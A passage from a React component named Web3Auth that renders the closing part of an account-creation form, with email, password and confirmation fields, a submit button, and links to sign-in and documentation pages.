                  className="w-full px-4 py-3 bg-deepspace/50 border border-dark-border/50 rounded-xl text-text-primary placeholder-text-muted focus:border-cyber-blue/50 focus:outline-none transition-colors"
                />
              </div>
              <div>
                <label className="block text-sm font-semibold text-text-primary mb-2">Email</label>
                <input
                  type="email"
                  value={accountEmail}
                  onChange={(e) => setAccountEmail(e.target.value)}
                  placeholder="you@example.com"
                  autoComplete="email"
                  className="w-full px-4 py-3 bg-deepspace/50 border border-dark-border/50 rounded-xl text-text-primary placeholder-text-muted focus:border-cyber-blue/50 focus:outline-none transition-colors"
                />
              </div>
              <div>
                <label className="block text-sm font-semibold text-text-primary mb-2">Password</label>
                <input
                  type="password"
                  value={accountPassword}
                  onChange={(e) => setAccountPassword(e.target.value)}
                  placeholder="Min. 8 characters"
                  autoComplete="new-password"
                  className="w-full px-4 py-3 bg-deepspace/50 border border-dark-border/50 rounded-xl text-text-primary placeholder-text-muted focus:border-cyber-blue/50 focus:outline-none transition-colors"
                />
              </div>
              <div>
                <label className="block text-sm font-semibold text-text-primary mb-2">Confirm password</label>
                <input
                  type="password"
                  value={accountPasswordConfirmation}
                  onChange={(e) => setAccountPasswordConfirmation(e.target.value)}
                  placeholder="Repeat your password"
                  autoComplete="new-password"
                  className="w-full px-4 py-3 bg-deepspace/50 border border-dark-border/50 rounded-xl text-text-primary placeholder-text-muted focus:border-cyber-blue/50 focus:outline-none transition-colors"
                />
              </div>
              <button
                type="submit"
                disabled={loading}
                className="w-full py-4 bg-gradient-to-r from-cyber-blue to-cyber-purple text-white font-bold rounded-xl transition-all duration-300 disabled:opacity-50"
              >
                {loading ? 'Creating...' : 'Create account'}
              </button>
              <p className="text-center text-sm text-text-muted">
                Already have an account?{' '}
                <Link to="/login" className="text-cyber-blue hover:text-cyber-purple">
                  Sign in
                </Link>
              </p>
            </form>
          )}

          {/* Footer Links */}
          <div className="mt-8 text-center text-sm text-text-muted">
            <p>
              Need help? <Link to="/documentation" className="text-cyber-blue hover:text-cyber-purple transition-colors">View Documentation</Link>
            </p>
          </div>
        </div>
      </div>
    </div>
  );
};

export default Web3Auth;
